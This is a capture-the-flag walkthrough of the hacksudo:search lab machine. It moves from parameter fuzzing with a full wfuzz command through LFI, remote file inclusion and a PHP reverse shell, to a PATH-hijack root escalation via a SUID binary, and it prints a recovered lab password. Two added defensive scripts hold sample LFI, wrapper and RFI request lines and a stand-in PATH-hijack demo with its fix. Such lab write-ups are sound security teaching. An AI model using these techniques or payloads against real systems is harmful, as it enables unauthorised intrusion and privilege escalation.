This is another machine from Vishal Waghmare’s hacksudo series. You can download the box from the link hacksudo:search.
Let's start with an nmap scan of the machine for open ports.
Next step: directory brute-forcing with gobuster.
Yes, there is a robots.txt, but look at what it says.
So I visited search1.php directly.
Clicking About and Contact produced the URLs below.
The Contact tab hinted that we need to find the name of the parameter search1.php takes. I used wfuzz for this; below is the command:
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 2918 http://192.168.9.84/search1.php?FUZZ=contact.php
- -c colours the output.
- -z file,<path> supplies the wordlist of payloads to try.
- --hh 2918 hides every response that is exactly 2918 characters long, which is the size of the unchanged baseline page; a response of any other size means the server reacted to that parameter name.
- FUZZ marks the position each word is substituted into, here the parameter name.
The discovered parameter is vulnerable to LFI: through search1.php I could read /etc/passwd.
I tried several LFI-to-RCE techniques and found that /var/log/auth.log is readable, which opens the door to log poisoning. I also discovered that RFI is possible, so let's try RFI.
RFI! What is RFI?
- RFI stands for Remote File Inclusion.
- It occurs when a web application builds the path of an include (in PHP, include/require) from user input without validating it, and the runtime is allowed to fetch URLs (allow_url_include=On in PHP). The attacker points the parameter at a script on a server they control, and the web server downloads and executes it with the web server's privileges. LFI is the same flaw restricted to files already present on the server.
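The request patterns behind the LFI, log-poisoning and RFI attempts described here, together with the allowlist check that would have stopped them, as an added shell example that is not part of the original writeup. It assumes the vulnerable parameter is called page (the writeup never shows the name wfuzz found), treats about.php and contact.php as the only legitimate includes, and runs over constructed access-log lines rather than real traffic.

```sh
#!/bin/sh
# Added example, not from the writeup. classify_include is the allowlist logic a
# fixed search1.php should apply to its include parameter; scan_log applies the
# same logic to web-server log lines to spot the attack attempts after the fact.
# Parameter name "page", the allowlist and the log lines are all assumptions.

# Print one of: allowed, wrapper, rfi, lfi, suspicious
classify_include() {
  v=$1
  case "$v" in
    about.php|contact.php)                       echo allowed ;;     # hypothetical allowlist
    php://*|data://*|expect://*|phar://*|zip://*|file://*)
                                                 echo wrapper ;;     # PHP stream wrappers
    *://*)                                       echo rfi ;;         # any other remote scheme
    /*|*../*|*%2e%2e*|*%2E%2E*|*%00*)            echo lfi ;;         # absolute path, traversal, null byte
    *)                                           echo suspicious ;;  # not on the allowlist
  esac
}

# Read access-log lines on stdin, pull out the page= value and classify it.
scan_log() {
  while IFS= read -r line; do
    # the value runs from "page=" to the next & or whitespace
    val=$(printf '%s\n' "$line" | sed -n 's/.*[?&]page=\([^& ]*\).*/\1/p')
    [ -n "$val" ] || continue
    printf '%s %s\n' "$(classify_include "$val")" "$val"
  done
}

# Constructed sample lines (not real traffic): one legitimate include, then the
# LFI, log-file read, php:// wrapper and RFI requests seen in this kind of attack.
SAMPLE_LOG='10.0.0.9 - - [01/Jan/2021:10:00:00 +0000] "GET /search1.php?page=contact.php HTTP/1.1" 200 2918
10.0.0.9 - - [01/Jan/2021:10:00:01 +0000] "GET /search1.php?page=../../../../etc/passwd HTTP/1.1" 200 1847
10.0.0.9 - - [01/Jan/2021:10:00:02 +0000] "GET /search1.php?page=/var/log/auth.log HTTP/1.1" 200 40211
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /search1.php?page=php://filter/convert.base64-encode/resource=search1.php HTTP/1.1" 200 3001
10.0.0.9 - - [01/Jan/2021:10:00:04 +0000] "GET /search1.php?page=http://10.0.0.9:8000/test.php HTTP/1.1" 200 31'

# Number of sample requests that are include attacks of any kind
count_attacks() {
  printf '%s\n' "$SAMPLE_LOG" | scan_log | grep -c -E '^(lfi|wrapper|rfi) '
}

printf '%s\n' "$SAMPLE_LOG" | scan_log
```

The classification deliberately rejects anything that is not on the allowlist instead of trying to blacklist dangerous strings: the wrapper and traversal patterns are only there so that a log review can name the technique, and the %2e checks cover the common URL-encoded form only, so decode the value before classifying it in a real deployment.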
To test whether RFI works, I created a .php file on the attacking machine with the contents below:
Then I started Python's SimpleHTTPServer and had the target fetch test.php through the vulnerable parameter.
Reverse Shell:
To get a reverse shell I copied php-reverse-shell.php from /usr/share/webshells/ (Kali's webshell collection), changed the IP address to the attacking machine's and the port to the one I wanted the shell on, and started a netcat listener on port 4444.
Then I fetched the file through the include as before, and got the reverse shell.
There are four users: hacksudo, john, monali and search.
LinPEAS flagged the file below, which looked interesting.
Decoding the base64 string in it gives:
I tried that username and password against MySQL, but the login failed.
So I listed the usernames we know alongside the recovered password:
USERNAMES: hacksudo, john, monali and search.
PASSWORD: MyD4dSuperH3r0!
Tried it with hacksudo first, and BINGO! We are hacksudo now.
Since SSH is open, I logged in as hacksudo over SSH to get a proper shell.
I used find to list SUID binaries; one stands out: /home/hacksudo/search/tool/searchinstall.
We can read its source code, and it runs the install command by bare name rather than by its full path, so the binary resolves install through whatever PATH the caller supplies.
Path to root:
- Create an executable file named install containing a malicious payload. I copied /bin/bash into it; a reverse-shell payload works too. Keep in mind that bash drops its effective UID when it differs from the real UID unless it is started with -p, so if the copied bash does not hand you a root shell, use a payload that does not reset privileges.
- Make it executable by everyone.
- Prepend the directory holding the malicious install to the PATH variable so it is searched first.
Now run searchinstall: it looks up install through our PATH, finds our file, and executes it with the SUID binary's privileges.
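The PATH-hijack mechanism behind these steps, reproduced as an added example that is not part of the original writeup. searchinstall, /usr/bin/install and the attacker's payload are replaced by temporary stand-in scripts and no SUID bit is involved, so it shows only how the lookup is redirected; the hardened variant shows the fix (a fixed PATH plus an absolute path to install).

```sh
#!/bin/sh
# Added example, not from the writeup. A program that runs `install` by bare
# name resolves it through the caller's PATH, so a writable directory placed
# first in PATH wins. All binaries here are stand-ins created in a temp dir.

# Build the stand-ins in a fresh temp dir and print its path.
setup_demo() {
  demo=$(mktemp -d)
  mkdir "$demo/trusted" "$demo/evil"

  # Stand-in for the legitimate install(1)
  printf '#!/bin/sh\necho trusted\n' > "$demo/trusted/install"
  # Attacker-controlled "install" (the writeup used a copy of /bin/bash; a marker is enough here)
  printf '#!/bin/sh\necho hijacked\n' > "$demo/evil/install"

  # Vulnerable stand-in for searchinstall: bare command name, inherited PATH
  printf '#!/bin/sh\ninstall\n' > "$demo/searchinstall_vuln"
  # Hardened stand-in: fixed PATH and an absolute path, so the caller cannot redirect the lookup
  printf '#!/bin/sh\nexport PATH=%s\n%s/install\n' "$demo/trusted" "$demo/trusted" \
    > "$demo/searchinstall_safe"

  chmod +x "$demo/trusted/install" "$demo/evil/install" \
           "$demo/searchinstall_vuln" "$demo/searchinstall_safe"
  echo "$demo"
}

# Run one stand-in with the attacker's directory first in PATH and print what ran.
run_with_hijacked_path() {
  demo=$(setup_demo)
  result=$(PATH="$demo/evil:$demo/trusted:$PATH" "$demo/$1")
  rm -rf "$demo"
  echo "$result"
}

run_vuln() { run_with_hijacked_path searchinstall_vuln; }   # prints: hijacked
run_safe() { run_with_hijacked_path searchinstall_safe; }   # prints: trusted

echo "vulnerable searchinstall ran: $(run_vuln)"
echo "hardened searchinstall ran:   $(run_safe)"
```

On the real box the same lookup happens inside a SUID-root process, which is what turns a hijacked install into a root shell; the fix is the same as in the hardened stand-in, never trust the inherited PATH from a privileged program.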
Thanks for reading!! Hope you like it.